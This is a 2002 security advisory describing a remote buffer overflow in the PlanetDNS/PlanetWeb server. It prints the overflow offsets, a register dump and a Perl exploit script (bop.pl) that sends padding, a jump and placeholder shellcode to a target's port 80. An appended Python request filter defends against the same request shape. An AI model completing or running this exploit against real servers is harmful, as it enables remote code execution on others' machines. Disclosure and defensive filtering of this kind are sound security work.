
bop.pl

21 Oct 2002. Reported by Securma Massine. Type: packetstorm. Source: packetstormsecurity.com

PlanetDNS software is vulnerable to buffer overflow, leading to potential remote code execution.

Code
hi

PlanetDNS (http://www.planetdns.net) is a commercial software package that lets you turn a computer into an Internet server, create an Internet name, and connect to a web server, FTP, mail server, etc. running on the computer.

PlanetDNS is vulnerable to a buffer overflow with an overwrite of eip (never posted before). It was already reported that 1024 bytes could crash the server, and I found that sending (without GET /) 6500 bytes overwrites eip and allows execution of shellcode. The overwrite is done with bytes 6449, 6450, 6451 and 6452.

Note also that ebx is always 4 bytes before the eip, so the ret address will be a jmp ebx or call ebx, which can be found in many loaded modules.

I wrote an exploit, tested on PlanetWeb v1.14, which gives the following register state:

```
Access violation - code c0000005 (first chance)
eax=0217dfb0 ebx=0217ffdc ecx=43434343 edx=7846f5b5 esi=0217dfd8 edi=00000000
eip=43434343 esp=0217df18 ebp=0217df38 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
43434343 ?? ???
```

Exploit code:

```perl
#!/usr/bin/perl -w
# tool bop.pl
# buffer overflow tested against PlanetWeb v1.14
# humm..this exploit is not for lamers...
# Greetz: marocit and #crack.fr (specialemet
#

use IO::Socket;

if ($#ARGV < 0)
{
    print "\n write the target IP!! \n\n";
    exit;
}

$shellcode = ("YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
# add your favorite shellcode
$buffer = "A" x 6444;
$ebx = "\x90\xEB\x08\x90";        # you are lucky because ebx = eip - 4 bytes; jmp short 0xff x0d3
$ret = "\x43\x43\x43\x43";        # insert your ret address (a jmp ebx or call ebx)
$minibuf = "\x90\x90\x90\x90";    # will be jumped over by EB 08

$connect = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ARGV[0]", PeerPort => "80");
unless ($connect) { die "cant connect $ARGV[0]" }

print $connect "$buffer$ebx$ret$minibuf$shellcode";
print "\nsending exploit......\n\n";
```
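A defensive pre-filter for the request shape the advisory describes, as an added example that is not part of the original advisory or of PlanetDNS: it inspects the first bytes a client sends to the web port and returns reasons to refuse them before they reach the server. The function name, reason codes, the 64-byte run cap and the sample inputs are assumptions made for illustration; only the 1024 and 6500 byte figures come from the text above.

```python
import re

# Assumed limits. 1024 comes from the advisory (that many bytes was reported
# to crash the server); the run cap is an illustrative choice.
MAX_REQUEST_LINE = 1024
MAX_BYTE_RUN = 64
REQUEST_LINE = re.compile(rb"[A-Z]{3,16} [\x21-\x7e]+ HTTP/\d\.\d")
LONG_RUN = re.compile(rb"(.)\1{%d,}" % (MAX_BYTE_RUN - 1), re.DOTALL)


def inspect_first_bytes(data: bytes) -> list:
    """Return reason codes for refusing what a client sent first; [] means pass."""
    reasons = []
    # Only the first line is checked against the request-line grammar.
    line = re.split(rb"\r?\n", data, maxsplit=1)[0]
    if len(line) >= MAX_REQUEST_LINE:
        reasons.append("too_long")
    if not REQUEST_LINE.fullmatch(line):
        reasons.append("no_request_line")   # e.g. data sent without "GET /"
    if LONG_RUN.search(data):
        reasons.append("byte_run")          # filler such as "AAAA..." or 0x90 padding
    return reasons


# Constructed inputs, not captured traffic.
SAMPLES = {
    "normal": b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n",
    "long_path": b"GET /" + b"ab" * 600 + b" HTTP/1.0\r\n\r\n",
    "raw_6500": b"A" * 6500,   # the shape described above: no method, 6500 bytes
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        verdict = inspect_first_bytes(data) or "pass"
        print(f"{name:10} {len(data):5} bytes -> {verdict}")
```

A filter like this belongs on a reverse proxy in front of the affected server; it narrows exposure but does not replace a fixed build.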
